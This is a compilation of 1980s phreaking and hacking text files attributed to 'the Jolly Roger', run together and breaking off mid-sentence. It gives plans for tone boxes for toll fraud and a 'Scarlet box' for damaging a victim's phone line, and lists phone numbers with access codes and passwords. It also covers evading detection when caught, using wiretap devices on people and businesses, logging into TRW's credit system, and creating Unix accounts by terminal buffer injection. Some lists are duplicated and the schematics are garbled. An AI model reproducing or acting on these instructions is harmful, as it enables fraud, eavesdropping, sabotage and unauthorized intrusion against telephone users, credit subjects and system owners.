/12 7144 .10 /24 216120 . 4 /24 71424 . 4 CODEN/3 303114 . 4 40 CASAN/3 714119 . 4 20 /12 303115 .18 /12 714213 .12 /24 30321 .22 /24 714124 . 4 FLMIA/3 305120 . 6 28 CASDI/3 714102 . 4 22 /12 305121 .18 (619)/12 714210 .14
/24 305122 . 4 /24 714121 . 4 ILCHI/3 312410 . 8 40 UTSLC/3 80120 . 4 22 /12 312411 .28 /12 80121 .14 /24 31224 . 4 /24 80112 . 4 MIDET/3 313214 . 6 30 FLTAM/3 81320 . 4 18 /12 313216 .18 /12 81321 .10 /24 31324 . 6 /24 813124 . 4 MOSLO/3 3145 . 4 16 MOKCI/3 816104 . 4 20 /12 314421 . 8 /12 816221 .12 /24 31420 . 4 /24 816113 . 4 GAATL/3 404113 . 8 32 CAGLE/3 ?? /12 404114 .20 /12 81821 .18 /24 40422 . 4 /24 CASJO/3 408111 . 4 34 CASAC/3 9167 . 4 16 /12 40821 .26 /12 91611 . 8 /24 408110 . 4 /24 91612 . 4 WIMIL/3 41420 . 4 24 NCRTP/3 91920 . 4 20 /12 41421 .16 /12 91921 .12 /24 414120 . 4 /24 919124 . 4
01/29/89 PC-Pursuit Modems Statistics Chart Number of Modems City Mnemonic 300 1200 2400 Total ---------- -------- --------- --------- --------- NJNEW 12 40 4 56 DCWAS 6 24 16 46 CTHAR 0 8 0 8 WASEA 4 22 4 30 NYNYO 4 14 4 22 CALAN 8 28 4 40 TXDAL 6 22 4 32 PAPHI 6 22 8 36 OHCLE 4 18 4 26 CODEN 4 18 22 44 FLMIA 6 18 4 28 ILCHI 8 28 4 40 MIDET 6 18 6 30 MOSLO 4 8 4 16 GAATL 8 20 4 32 CASJO 4 26 4 34 WIMIL 4 16 4 24 CAOAK 4 8 4 16 CAPAL 4 8 0 12 CASFA 6 10 4 20 ORPOR 2 6 0 8 AZPHO 4 12 4 20 MNMIN 4 14 4 22 MABOS 4 20 8 32 TXHOU 8 24 10 42 CACOL 4 10 4 18 CASAN 4 12 4 20 CASDI 4 14 4 22 UTSLC 4 14 4 22 FLTAM 4 10 4 18 MOKCI 4 12 4 20 CAGLE 4 18 4 26 CASAC 4 8 4 16 NCRTP 4 12 4 20
-------- --------- --------- --------- Total 166 562 170 898 ======== ========= ========= ========= Average 4.8823529 16.529412 5 26.411765 NOTE: CASAC/3, CASAC/24 were estimated. I think the statistics basically speak for themselves. I am sure there will no doubt be hundreds of people who will not smile at the number of specific kinds of ports supported, not to mention the number of 'dead' or 'down' modems you will find when you verify the totals. Usually, 2% to perhaps 10% of the modems are 'dead' with specific ones repeatedly failing week after week. History Of This Collection: =========================== Almost a year ago a small selected group of devoted individuals got together to discuss problems with the PC- Pursuit Network, in the middle of our discussions a question was asked as to how the network really processes our calls. This was intended to help us assess SET? commands and other such matters. When the address hypothesis was offered we quickly set out to prove it. It was proved in about 3 minutes with the discovery of 2011 (First try was xxx1). The data has continually been collected and analyzed ever since, but until now, has never been mass released. A small group of teen age hackers discovered several interesting things that can be done with these addresses-- many of which will not be discussed here short of mentioning that these ports connected to via these addresses are not limited to PC-Pursuiters. You can, however, fight "dead" dialout modems in cities via the address method. Dead modems can be located in about 10 seconds (faster than Telenet), and can either be reported or skipped past by the user connecting to the next modem in the sequence after the "dead" one. (Note: Say 2011.3 is dead, connect to 2011.4 and you will be past it. If 2011.4 is busy, go to 2011.5. The reader should notice 2011.3 is the same as 2011C.) The most interesting value of these addresses is that one can count the number of ports that Telenet keeps so secret (Grin). When there were only 28 cities in operation there were an average of 2.7 300 baud, 9.4 1200 baud, and 2.5 2400 baud modems in each city. Some cities had as little as 2 modems on a port and as many as 12. Only recently has the number of modems per city begun to jump. How To Update The Count Yourself: ================================= An ID is not required to "request" one of these ports, thus the tallying can be done any time of day by simply typing the number at the @ prompt. Here is an example with four modems (NJNEW/24): @20122.1 201 22A REFUSED COLLECT CONNECTION 19 80 @20122.2 201 22B REFUSED COLLECT CONNECTION 19 80 @20122.3 201 22C REFUSED COLLECT CONNECTION 19 80 @20122.4 201 22D REFUSED COLLECT CONNECTION 19 80 @20122.5
201 22E ILLEGAL ADDRESS 19 80 The reader should be aware that PC-Pursuit ports always respond with '19 80'. Do not confuse it with '19 00', which are not PC-Pursuit ports. In the above example we know there are four ports because the forth was the last existing port before we encountered the 'ILLEGAL ADDRESS.' There are several ways to signify that you have gone one beyond the end of the ports: 1) xxx xxx ILLEGAL ADDRESS 19 80 2) xxx xxx NOT OPERATING 19 80 3) The request freezes (Note: Issue a BREAK then D to abort the attempt yielding 'ATTEMPT ABORTED'.) You should be aware that modems which are out of order in the middle of the sequence can respond with 'NOT OPERATING' or may freeze the request. You should also note that when updating the existing list, all you need to do is try to request the next modem beyond the end as of the last check. Finding Newly Added Ports: ========================== Many ports have not yet been installed; hence, we do not yet know the addresses. New ports may be found by entering the first three digits of the area code and appending (1-29, 101-129, 201-229, 301-329, etc.) until the 'REFUSED COLLECT CONNECTION 19 80' appears. Once this is found, simply log onto the port address with your ID and R/V dial some silly series of digits, disconnect the port, then connect to the PC-Pursuit mnemonic you think it might be and R/V redial the last number. If the numbers match, you found it.
Pearl Box Plans by the Jolly Roger
The Pearl Box:Definition - This is a box that may substitute for many boxeswhich produce tones in hertz. The Pearl Box when operated correctly canproduce tones from 1-9999hz. As you can see, 2600, 1633, 1336 and othercrucial tones are obviously in its sound spectrum.
Materials you will need in order to build The Pearl Box:========================================================C1, C2:.5mf or .5uf ceramic disk capacitorsQ1.....NPN transistor (2N2222 works best)S1.....Normally open momentary SPST switchS2.....SPST toggle switchB1.....Standard 9-Volt batteryR1.....Single turn, 50k potentiometerR2..... " " 100k potentiometerR3..... " " 500k potentiometerR4..... " " 1meg potentiometerSPKR...Standard 8-ohm speakerT1.....Mini transformer (8-ohm works best)Misc...Wire, solder, soldering iron, PC board or perfboard, box to contain the completed unit, battery clip
‡Instructions for building Pearl Box:======================================Since the instruction are EXTREMELY difficult to explain in words, you willbe given a schematic instead. It will be quite difficult to follow but tryit any way.
(Schematic for The Pearl Box)+---+------------+---------+ ! ! \ C1 C2 \ ! ! + + + -----+T1 !\ +------------+-+ ! b c-------! + ! Q1 ! +-S1- ! e-----S2---+ ! SPKR ! ! ! +---- ! B1 ! ! ! ! ! +-------+ !R1 R2 R3 R4! /\/\ /\/\ /\/\ /\/\ +--+ +--+ +--+Now that you are probably thoroughly confused, let me explain a fewminor details. The potentiometer area is rigged so that the left pole isconnected to the center pole of the potentiometer next to it.The middle terminal of T1 is connected to the piece of wire that runs downto the end of the battery.
Correct operation of The Pearl Box:===================================You may want to get some dry-transfer decals at Radio Shack to make thisjob a lot easier. Also, some knobs for the tops of the potentiometersmay be useful too. Use the decals to calibrate the knobs. R1 is the knobfor the ones place, R2 is for the tens place, R3 if for the hundredsplace and R4 is for the thousands place. S1 is for producing the all thetones and S2 is for power.Step 1: Turn on the power and adjust the knobs for the desired tone. (Example: For 2600 hz- R1=0:R2=0:R3=6:R4=2)Step 2: Hit the pushbutton switch and VIOLA! You have the tone. Ifyou don't have a tone recheck all connections and schematic.
--------------------Jolly Roger
The Phreak file courtesy of the Jolly Roger
202 282 3010 UNIV. OF D.C.202 553 0229 PENTAGON T.A.C.202 635 5710 CATHOLIC UNIV. OF AMERICA202 893 0330 DEFENSE DATA NETWORK202 893 0331 DEFENSE DATA NETWORK202 965 2900 WATERGATE203 771 4930 TELEPHONE PIONEERS206 641 2381 VOICE OF CHESTER212 526 1111 NEW YORK FEED LINE212 557 4455 SEX HOT LINE212 799 5017 ABC NY FEED LINE
212 934 9090 DIAL-AN-IDIOT212 976 2727 P.D.A.212 986 1660 STOCK QUOTES213 541 2462 STOCK MARKET REPORTS213 547 6801 NAVY SHIPS INFO213 576 6061 " "213 664 3321 NEWS FOR THE BLIND301 393 1000 " "301 667 4280 LOTTERY INFO312 939 1600 " "404 221 5519 NUCLEAR COMMISSION408 248 8818 1ST NAT'L BANK415 642 2160 EARTHQUAKE REPCRT505 883 6828 " "512 472 2181 " "512 472 4263 WIERD RECORDING512 472 9833 " "512 472 9941 INSERT 25 CENTS512 472 9941 SPECIAL RECORDING512 870 2345 " "516 794 1707 " "619 748 0002 LOOP LINE619 748 0003 " "703 331 0057 MCI (5 DIGITS)703 334 6831 WASH. POST703 354 8723 COMPEL INC.703 737 2051 METROPHONE (6 DIGITS)703 835 0500 VALNET (5 DIGITS)703 861 7000 SPRINT (6/8 DIGITS)703 861 9181 SPRINT (6/8 DIGITS)714 974 4020 CA. MAINFRAME716 475 1072 N.Y. DEC-SYSTEM800 222 0555 RESEARCH INSTITUTE800 223 3312 CITIBANK800 227 5576 EASTERN AIRLINES800 248 0151 WHITE HOUSE PRESS800 321 1424 FLIGHT PLANES800 323 3026 TEL-TEC (6 GIGITS)800 323 4756 MOTOROLA DITELL800 323 7751 M.C.I. MAINFRAME800 325 4112 EAsYLINK800 325 6397 F.Y.I.800 344 4000 MSG SYSTEM800 368 6900 SKYLINE ORDER LINE800 424 9090 RONALD REAGAN'S PRESS800 424 9096 WHITE HOUSE SWITCH800 438 9428 ITT CITY CALL SWITCHING800 521 2255 AUTONET800 521 8400 TRAVELNET (8 DIGITS)800 526 3714 RCA MAINFRAME800 527 1800 TYMNET800 621 3026 SPECIAL OPERATOR800 621 3028 " "800 621 3030 " "800 621 3035 " "800 631 1146 VOICE STAT800 821 2121 BELL TELEMARKETING800 828 6321 XEROX $
800 858 9313 RECORD-A-VOICE800 882 1061 AT&T STOCK PRICES914 997 1277 " "916 445 2864 JERRY BROWNN/A 950 1000 SPRINTN/A 950 1022 MCI EXECUNETN/A 950 1033 US TELEPHONEN/A 950 1044 ALLNET (6 DIGITS)N/A 950 1066 LEXITELN/A 950 1088 SKYLINE (6 DIGITS)
-----------------------------------PHONE # DESCRIPTION/CODE-----------------------------------201-643-2227 CODES:235199,235022 AND 121270 800-325-4112 WESTERN UNION 800-547-1784 CODES:101111,350009 AND 350008 800-424-9098 TOLL FREE WHITE HS. 800-424-9099 DEFENSE HOT LINE 202-965-2900 WATERGATE 800-368-5693 HOWARD BAKER HOTLN 202-456-7639 REAGANS SECRETARY 202-545-6706 PENTAGON 202-694-0004 PENTAGON MODEM 201-932-3371 RUTGERS 800-325-2091 PASSWORD: GAMES 800-228-1111 AMERICAN EXPRESS 617-258-8313 AFTER CONNECT PRESS CTRL-C 800-323-7751 PASSWORD:REGISTER 800-322-1415 CODES:266891,411266 AND 836566 (USED BY SYSOP)----------------------------------- The following 800 #'s have beencollected however no codes havebeen found yet! if you hack anyplease let me know...-----------------------------------phone # codes:-----------------------------------
800-321-3344 ???????????800-323-3027 ???????????800-323-3208 ???????????800-323-3209 ???????????800-325-7222 ???????????800-327-9895 ???????????800-327-9136 ???????????800-343-1844 ???????????800-547-1784 ???????????800-547-6754 ???????????800-654-8494 ???????????800-682-4000 ???????????800-858-9000 ???????????800 #'s with carriers.800-323-9007800-323-9066800-323-9073800-321-4600800-547-17841-800 numbers of the goverment.800-321-1082:NAVY FINANCE CENTER.800-424-5201:EXPORT IMPORT BANK.800-523-0677:ALCOHOL TOBACCO AND.800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER.800-424-5201:EXPORT IMPORT BANK.800-523-0677:ALCOHOL TOBACCO AND.800-532-1556:FED INFORMATION CNTR.800-325-4072:COMBAT & ARMS SERVICE.800-325-4095:COMBAT SUPPORT BRANCH.800-325-4890:ROPD USAR COMBAT ARMS.800-432-3960:SOCIAL SECURITY.800-426-5996:PUGET NAVAL SHIPYARD.Directory of toll free numbers.800-432-3960:SOCIAL SECURITY.800-426-5996:PUGET NAVAL SHIPYARD.Directory of toll free numbers.301-234-0100:BALTIMORE ELECTRIC.202-456-1414:WHITE HOUSE.202-545-6706:PENTAGON.202-343-1100:EPA.714-891-1267:DIAL-A-GEEK.714-897-5511:TIMELY.213-571-6523:SATANIC MESSAGES.213-664-7664:DIAL-A-SONG.405-843-7396:SYNTHACER MUSIC.213-765-1000:LIST OF MANY NUMBERS.512-472-4263:WIERD.512-472-9941:INSERT 25.203-771-3930:PIONEERS.213-254-4914:DIAL-A-ATHIEST.212-586-0897:DIRTY.213-840-3971:HOROWIERD203-771-3930:PIONEERS471-9420,345-9721,836-8962836-3298,323-4139,836-5698471-9440,471-9440,471-6952476-6040,327-9772,471-9480800-325-1693,800-325-4113
800-521-8400:VOICE ACTIVATED213-992-8282:METROFONE ACCESS NUMBER617-738-5051:PIRATE HARBOR617-720-3600:TIMECOR #2301-344-9156:N.A.S.A PASSWORD:GASET318-233-6289:UNIVERSITY LOUISIANA213-822-2112:213-822-3356213-822-1924:213-822 3127213-449-4040:TECH CENTER213-937-3580:TELENET1-800-842-87811-800-368-56761-800-345-3878212-331-1433213-892-7211213-626-2400713-237-1822713-224-6098713-225-1053713-224-9417818-992-82821-800-521-8400After entering the sprint code,and, C+Destination number.Then enter this:number:"205#977#22",And the main tracer for sprint will be disabled.215-561-3199/SPRINT LONG DISTANCE202-456-1414/WHITE HOUSE011-441-930-4832/QUEEN ELIZABETH916-445-2864/JERRY BROWN800-424-9090/RONALD REAGAN'S PRESS212-799-5017/ABC NEW YORK FEED LINE800-882-1061/AT & T STOCK PRICES212-986-1660/STOCK QUOTES213-935-1111/WIERD EFFECTS!512-472-4263/WIERD RECORDING212-976-2727/P.D.A.619-748-0002/FONE CO. TESTING LINES900-410-6272/SPACE SHUTTLE COMM.201-221-6397/AMERICAN TELEPHONE215-466-6680/BELL OF PENNSYLVANIA202-347-0999/CHESAPEAKE TELEPHONE213-829-0111/GENERAL TELEPHONE808-533-4426/HAWAIIAN TELEPHONE312-368-8000/ILLINOIS BELL TELEPHONE317-265-8611/INDIANA BELL313-223-7233/MICHIGAN BELL313-223-7223/NEVADA BELL207-955-1111/NEW ENGLAND TELEPHONE201-483-3800/NEW JERSEY BELL212-395-2200/NEW YORK TELEPHONE515-243-0890/NORTHWESTERN BELL216-822-6980/OHIO BELL206-345-2900/PACIFIC NORTHWEST BELL213-621-4141/PACIFIC TELEPHONE205-321-2222/SOUTH CENTRAL BELL404-391-2490/SOUTHERN BELL203-771-4920/SOUTHERN NEW ENGLAND314-247-5511/SOUTHWESTERN BELL414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN303-232-8555/HP3000315-423-1313/DEC-10313-577-0260/WAYNE STATE512-474-5011/AUSTIN COMPUTERS516-567-8013/LYRICS TIMESHARING212-369-5114/RSTS/E415-327-5220/NEC713-795-1200/SHELL COMPUTERS518-471-8111/CNA OF NY800-327-6761/AUTONET800-228-1111/VISA CREDIT CHECK713-483-2700/NASUA213-383-1115/COSMOS408-280-1901/TRW404-885-3460/SEARS CREDIT CHECK414-289-9988/AARDVARK SOFTWARE919-852-1482/ANDROMEDA INCORPORATED213-985-2922/ARTSCI714-627-9887/ASTAR INTERNATIONAL415-964-8021/AUTOMATED SIMULATIONS503-345-3043/AVANT GARDE CREATIONS415-456-6424/BRODERBUND SOFTWARE415-658-8141/BUDGE COMPANY714-755-5392/CAVALIER COMPUTER801-753-6990/COMPUTER DATA SYSTEMS213-701-5161/DATASOFT INC.213-366-7160/DATAMOST716-442-8960/DYNACOMP213-346-6783/EDU-WARE800-631-0856/HAYDEN919-983-1990/MED SYSTEMS SOFTWARE312-433-7550/MICRO LAB206-454-1315/MICROSOFT301-659-7212/MUSE SOFTWARE209-683-6858/ON-LINE SYSTEMS203-661-8799/PROGRAM DESIGN (PDI)213-344-6599/QUALITY SOFTWARE303-925-9293/SENTIENT SOFTWARE702-647-2673/SIERRA SOFTWARE916-920-1939/SIRIUS SOFTWARE215-393-2640/SIR-TECH415-962-8911/SOFTWARE PUBLISHERS415-964-1353/STRATEGIC SIMULATIONS217-359-8482/SUBLOGIC COM.206-226-3216/SYNERGISTIC SOFTWAREHere are a few tips on how not to get caught when using MCI or othersuch services: 1- Try not to use them for voice to voice personal calls. Try to use them for computer calls only. Here is why: MCI and those other services can't really trace the calls that come through the lines,they can just monitor them. They can listen in on your calls and from that,they can get your name and other information from the conversation. They can also call the number you called and ask your friend some questions. If you call terminals and BBS'S then it is much harder to get information. For one thing,most sysops won't give these dudes that call any info at all or they will act dumb because they
PHREAK themselves! 2- Beware when using colored boxes! They are easy to find!!!!! 3- Try to find a sine-wave number. Then use an MCI or other service to call it. You will hear a tone that goes higher and lower. If the tone just stops,then that code is being monitored and you should beware when using it.---------------------------------------- If you do get caught,then if you think you can,try to weasel out ofit. I have heard many stories about people that have pleaded with the MCI guys and have been let off. You will get a call from a guy that has been monitoring you. Act nice. Act like you know it is now wrong to do this kind of thing.....just sound like you are sorry for what you did. (If you get a call,you probably will be a little sorry!) Otherwise,it is very dangerous!!!!!!! (Very with a capital V!)
-------------------Jolly Roger

Red Box Plans by the Jolly Roger
Red boxing is simulating the tones produced by public payphones when youdrop your money in. The tones are beeps of 2200 Hz + 1700 HzNickle = 1 beep for 66 milliseconds.Dime = 2 beeps, each 66 milliseconds with a 66 millisecond pause betweenbeeps.Quarter = 5 beeps, each 33 milliseconds with a 33 millisecondpause between beeps.
There are two commonly used methods being used by Phreaks to make freecalls.1. An electronic hand-held device that is made from a pair of Wien-bridgeoscillators with the timing controlled by 555 timing chips.2. A tape recording of the tones produced by a home computer. One ofthe best computers to use would be an Atari ST. It is one of the easiercomputers to use because the red box tones can be produced in basic withonlyabout 5 statments.
--------------------Jolly Roger
[__RemObS_________________________] by the Jolly Roger
Some of you may have heard of devices called Remobs which standsfor Remote Observation System. These Devices allow supposedlyauthorized telephone employees to dial into them from anywhere, andthen using an ordinary touch tone fone, tap into a customer's linein a special receive only mode. [The mouthpiece circuit isdeactivated, allowing totally silent observation from anyfone in the world (Wire tapping without a court order is againstthe law)]
[__How Remobs Work______________]Dial the number of a Remob unit. Bell is rumored to put them in the555 information exchanges, oron special access trunks[Unreachable except via blue box]. A tone will then be heardfor approximately 2 seconds and then silence. You must key in
(In DTMF) a 2 to 5 digit access code while holding each digit downat least 1 second. If the code is not entered within 5 or 6 seconds,the Remob will release and must be dialed again. If the code issupposedly another tone will be heard. A seven digit subscriberfone number can then be entered [The Remob can only handle certain'exchanges' which are prewired, so usually one machine cannotmonitor an entire NPA]. The Remob will then connect to thesubscribers line. The listener will hear the low level idle toneas long as the monitored party is on hook. As the monitored partydials [rotary or DTMF], the listener would hear [And Record]the number being dialed. Then the ENTIRE conversation, datalink,whatever is taking place, all without detection. There is nocurrent box which can detect Remob observation, since it is being donewith the telephone equipment that makes the connection. When thelistener is finished monitoring of that particular customer, he keysthe last digit of the access code to disconnects him from themonitored line and return to the tone so that he can key in another7 digit fone #. When the listener is totally finished with the Remob,he keys a single 'disconnect digit' which disconnects him from theRemob so that the device can reset and be ready for another caller.
[_History of Remobs_______________] Bell has kept the existance of Remobs very low key. Only in1974, Bell acknowledged that Remobs existed. The device wasfirst made public during hearings on "Telephone Monitoring Practicesby Federal Agencies" before a subcommittee on governmentoperations. House of Representatives, Ninety-Third Congress, June1974.It has since been stated by Bell that the Remob devicesare used exclusively for monitoring Bell employees such as operators,information operators, etc., to keep tabs on their performance.[Suuureee, were stupid]
[__Possible Uses for Remobs__] The possible uses of Remobs are almost as endless as the usesof self created fone line. Imagine the ability to monitor bank linesetc, just off the top of my head I can think of these applications:
Data Monitoring of:TRWNational Credit BureauAT&T CosmosBank InstitutionsCompuserve and other Networks. Voice Monitoring of:Bank InstitutionsMail Order buisnesses.Bell Telephone themselves.Any place handling sensitive or important information.Anyone that you may not like.
With just one Remob, someone could get hundreds of credit cards,find out who was on vacation, get compuserve passwords by the dozens,disconnect peoples fones, do credit checks, find out about anythingthat they may want to find out about. Im sure you brilliantcan see the value of a telephone hobbiest and a telecommunicationsenthusist getting his hands on a few choice Remobs.
[_Caution________________________] If any reader should discover a Remob during his (or her) scanningexcursions, please keep in mind the very strict federal lawsregarding wiretapping and unauthorized use of private Bell property.
------------------Jolly Roger
Scarlet Box Plans by the Jolly Roger
The purpose of a Scarlet box is to create a very bad conection,it can be used to crash a BBS or just make life miserable for those youseek to avenge.Materials: 2 alligator clips, 3 inch wire, or a resister(plain wire will create greatest amount of static)(Resister will decrease the amount of static in porportion tothe resister you are using)
Step (1): Find the phone box at your victims house, and pop the cover off.Step (2): Find the two prongs that the phone line you wish to box areconnected to.Step (3): Hook your alligator clips to your (wire/resister).Step (4): Find the lower middle prong and take off all wires connected toit, i think this disables the ground and call waiting and shit like that.Step (5): Now take one of the alligator clips and attach it to the uppermost prong, and take the other and attach it to the lower middle prong.Step (6): Now put the cover back on the box and take off!!
** ######## ** ** # #### # ** ######## / # #### # / ######## / / / / / / / / **/ ** ** ** ** **
(**)= prongs **(/) = (wire/resister)(##)= some phone bullshit
--------------------Jolly Roger
Silver Box Plans by the Jolly Roger
Introduction:------------ First a bit of Phone Trivia. A standard telephone keypad has 12
buttons.These buttons, when pushed, produce a combination of two tones. These tonesrepresent the row and column of the button you are pushing. 1 1 1 2 3 4 0 3 7 9 6 7 697 (1) (2) (3) 770 (4) (5) (6) 851 (7) (8) (9) 941 (*) (0) (#)So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc.
Function:-------- What the Silver Box does is just creates another column of buttons,with the new tone of 1633. These buttons are called A, B, C, and D.
Usefulness:---------- Anyone who knows anything about phreaking should know that in theold days of phreaking, phreaks used hardware to have fun instead of otherpeople's Sprint and MCI codes. The most famous (and useful) was the goodol' Blue Box. However, Ma Bell decided to fight back and now most phonesystemshave protections against tone-emitting boxes. This makes boxing justabout futile in most areas of the United States (ie those areas withCrossbaror Step-By-Step). If you live in or near a good-sized city, then your phonesystem is probably up-to-date (ESS) and this box (and most others)will be useless. However, if you live in the middle of nowhere (no offenseintended), you may find a use for this and other boxes.
Materials:--------- 1 Foot of Blue Wire 1 Foot of Grey Wire 1 Foot of Brown Wire 1 Small SPDT Switch (*) 1 Standard Ma Bell Phone(*) SPDT = Single Pole/Double Throw
Tools:----- 1 Soldering Iron 1 Flat-Tip Screwdriver
Procedure:---------(1) Loosen the two screws on the bottom of the phone and take the casinfoff.(2) Loosen the screws on the side of the keypad and remove the keypad fromthe mounting bracket.(3) Remove the plastic cover from the keypad.(4) Turn the keypad so that *0# is facing you. Turn the keypad over. You'llseea bunch of wires, contacts, two Black Coils, etc.(5) Look at the Coil on the left. It will have five (5) Solder Contacts
facing you. Solder the Grey Wire to the fourth Contact Pole from the left.(6) Solder the other end of the Grey Wire to the Left Pole of the SPDTSwitch.(7) Find the Three (3) Gold-Plated Contacts on the bottom edge of thekeypad.On the Left Contact, gently seperate the two touching Connectors (they'resoldered together) and spread them apart.(8) Solder the Brown Wire to the Contact farthest from you, and solder theother end to the Right Pole of the SPDT Switch.(9) Solder the Blue Wire to the Closest Contact, and the other end to theCenter Pole of the SPDT Switch.ð ðð ð(10) Put the phone back together.
Using The Silver Box:-------------------- What you have just done was installed a switch that will changethe 369# column into an ABCD column. For example, to dial a 'B', switchto Silver Box Tones and hit '6'. Noone is sure of the A, B, and C uses. However, in an area with anold phone system, the 'D' button has an interesting effect. Dial DirectoryAssistance and hold down 'D'. The phone will ring, and youshould get a pulsing tone. If you get a pissed-off operator, you have anewer phone system with defenses against Silver Boxes.At the pulsing tone, dial a 6 or 7. These are loop ends.
-----------------Jolly Roger
Bell Trashing by the Jolly Roger
The Phone Co. will go to extreams on occasions. In fact, unlessyou really know what to expect from them, they will suprise the heckout of you with their "unpublished tarriffs". Recently, a situationwas brought to my attention that up till then I had been totalyunaware of, least to mention, had any concern about. It involved gar-bage! The phone co. will go as far as to prosecute anyone who rumagesthrough their garbage and helps himself to some Of course, they have their reasons for this, and no doubt benefitfrom such action. But, why should they be so picky about garbage? Theanswer soon became clear to me: those huge metal bins are filled upwith more than waste old food and refuse... Although it is PacificTele. policy to recycle paper waste products, sometimes employees dooverlook this sacred operation when sorting the garbage. Thustop-secret confidential Phone Co. records go to the garbage binsinstead of the paper shredders. Since it is constantly being updatedwith "company memorandums, and supplied with extensive referencematerial, the Phone co. must continualy dispose of the outdatedmaterials. Some phone companies are supplied each year with thecomplete "System Practices" guide. This publication is an over 40foot long library of reference material about everything to do withtelephones. As the new edition arrives each year, the old version of"System Practices" must also be thrown out. I very quickly figured out where some local phone phreaks weregetting their material. They crawl into the garbage bins and removeselected items that are of particular interest to them and theirfellow phreaks. One phone phreak in the Los Angeles area has salvagedthe complete 1972 edition of "Bell System Practices". It is so largeand was out of order (the binders had been removed) that it took himover a year to sort it out and create enough shelving for it in hisgarage.
Much of this "Top Secret" information is so secret that most phonecompanies have no idea what is in their files. They have their handsfull simply replacing everything each time a change in wordingrequires a new revision. It seems they waste more paper than they canread! It took quite a while for Hollywood Cal traffic manager to figureout how all of the local phone phreaks constantly discovered theswitchroom test numbers Whenever someone wanted to use the testboard, they found the localphone phreaks on the lines talking to all points all over the world.It got to the point where the local garbage buffs knew more about theoffice operations than the employees themselves. One phreak went sofar as to call in and tell a switchman what his next daily assignmentwould be. This, however, proved to be too much. The switchmantraced the call and one phone phreak was denied the tool of his trade. In another rather humorous incident, a fellow phreak was rumagingthrough the trash bin when he heard somone apraoching. He pressed upagainst the side of the bin and silently waited for the goodies tocome. You can imagine his surprise when the garbage from the lunchroomlanded on his head. Most people find evenings best for checking outtheir local telco trash piles. The only thing necessary is aflashlight and, in the case mentioned above, possibly a rain coat. Aword of warning though, before you rush out and dive into the trashheap. It is probably illegal, but no matter where you live, youcertainly won't get the local policeman to hold your flashlight foryou. --------------------Jolly Roger
Canadian WATS Phonebook courtesy of the Jolly Roger
800-227-4004 ROLM Collagen Corp.800-227-8933 ROLM Collagen Corp.800-268-4500 Voice Mail800-268-4501 ROLM Texaco800-268-4505 Voice Mail800-268-6364 National Data Credit800-268-7800 Voice Mail800-268-7808 Voice Mail800-328-9632 Voice Mail800-387-2097 Voice Mail800-387-2098 Voice Mail800-387-8803 ROLM Canadian Tire800-387-8861 ROLM Canadian Tire800-387-8862 ROLM Canadian Tire800-387-8863 ROLM Canadian Tire800-387-8864 ROLM Canadian Tire800-387-8870 ROLM Halifax Life800-387-8871 ROLM Halifax Life800-387-9115 ASPEN Sunsweep800-387-9116 ASPEN Sunsweep800-387-9175 PBX [Hold Music=CHUM FM]800-387-9218 Voice Messenger800-387-9644 Carrier800-426-2638 Carrier800-524-2133 Aspen800-663-5000 PBX/Voice Mail [Hold Music=CFMI FM]800-663-5996 Voice Mail (5 rings)800-847-6181 Voice Mail
‡NOTES: Each and every one of these numbers is available to the 604(British Columbia) Area Code. Most are available Canada Wide and someare located in the United States. Numbers designated ROLM have beenidentified as being connected to a ROLM Phonemail system.Numbers designated ASPEN are connected to an ASPEN voice message system.Numbers designated VOICE MAIL have not been identified as to equipmentin use on that line. Numbers designated carrier are answered by a modemor data set.Most Voice Message systems, and ALL Rolms, sound like an answering machine.Press 0 during the recording when in a rolm, * or # or other DTMF in othersystems, and be propelled into another world...
Brought to you in the Cookbook by the Jolly Roger!!!!!!!!!!!!!!!!
Hacking TRW by the Jolly Roger
When you call TRW, the dial up will identify itself with the message"TRW".It will then wait for you to type the appropiate answer back (such asCTRL-G) Once This has been done, the system will say "CIRCUIT BUILDING INPROGRESS"Along with a few numbers. After this, it clears the screen(CTRL L) followed by a CTRL-Q. After the system sends the CTRL-Q, It isready for the request. You first type the 4 character identifyer for thegeographical area of the account..
(For Example) TCA1 - for certain Calif. & Vicinity subscribers.TCA2 - A second CALF. TRW System.TNJ1 - Their NJ Database.TGA1 - Their Georgia Database.
The user then types A and then on the next line, he must typehis 3 char. Option. Most Requests use the RTS option.OPX, RTX, and a few others exist. (NOTE) TRW will accept an A, C,or S as the 'X' in the options above.) Then finally, the user types his 7digit subscriber code. He appends his 3-4 character password after it. Itseems that if you manage to get hold of a TRW Printout (Trashing at Sears,Saks, ETC. or from getting your credit printout from them) Their subscribercode will be on it leaving only a 3-4 character p/w up to you.
For Example,(Call the DialUp)TRW System Types, ST) CTRL-G(You type,YT) Circuit building in progress 1234(ST) CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AAA (YT]Note: This sytem is in Half Duplex, Even Parity, 7 Bits per word and2 Stop Bits.
CAUTION: It is a very stressed rumor that after typing in the TRWpassword Three (3) times.. It sets an Automatic Number Identification onyourass, so be careful. And forget who told you how to do this..
------------------Jolly Roger
Hacking Vax's & Unix by the Jolly Roger
Unix is a trademark of At&t (and you know what that means)
_______________________________________In this article, we discuss the unix system that runs onthe various vax systems. If you are on another unix-type system, somecommands may differ, but since it is licenced to bell, they can't make manychanges._______________________________________Hacking onto a unix system is very difficult, and in this case, we advisehaving an inside source, if possible. The reason it is difficult to hack avax is this: Many vax, after you get a carrier from them, respond=>Login:They give you no chance to see what the login name format is. Mostcommonlyused are single words, under 8 digits, usually the person's name. There isa way around this: Most vax have an acct. called 'suggest' for people touse to make a suggestion to the system root terminal. This is usuallywatchedby the system operator, but at late he is probably at home sleeping orscrewing someone's brains out. So we can write a program to send at thevax this type of a message:A screen freeze (Cntrl-s), screen clear (system dependant), about 255garbage characters, and then a command to create a login acct., after whichyou clear the screen again, then unfreeze the terminal. What this does:When the terminal is frozen, it keeps a buffer of what is sent. well, thebuffer is about 127 characters long. so you overflow it with trash, andthenyou send a command line to create an acct. (System dependant). after thisyou clear the buffer and screen again, then unfreeze the terminal. This isa bad way to do it, and it is much nicer if you just send a command tothe terminal to shut the system down, or whatever you are after...There is always, *Always* an acct. called root, the most powerful acct.to be on, since it has all of the system files on it. If you hack yourway onto this one, then everything is easy from here on...On the unix system, the abort key is the Cntrl-d key. watch how many timesyou hit this, since it is also a way to log off the system!A little about unix architechture: The root directory, called root, iswhere the system resides. After this come a few 'sub' root directories,usually to group things (stats here, priv stuff here, the user loghere...).Under this comes the superuser (the 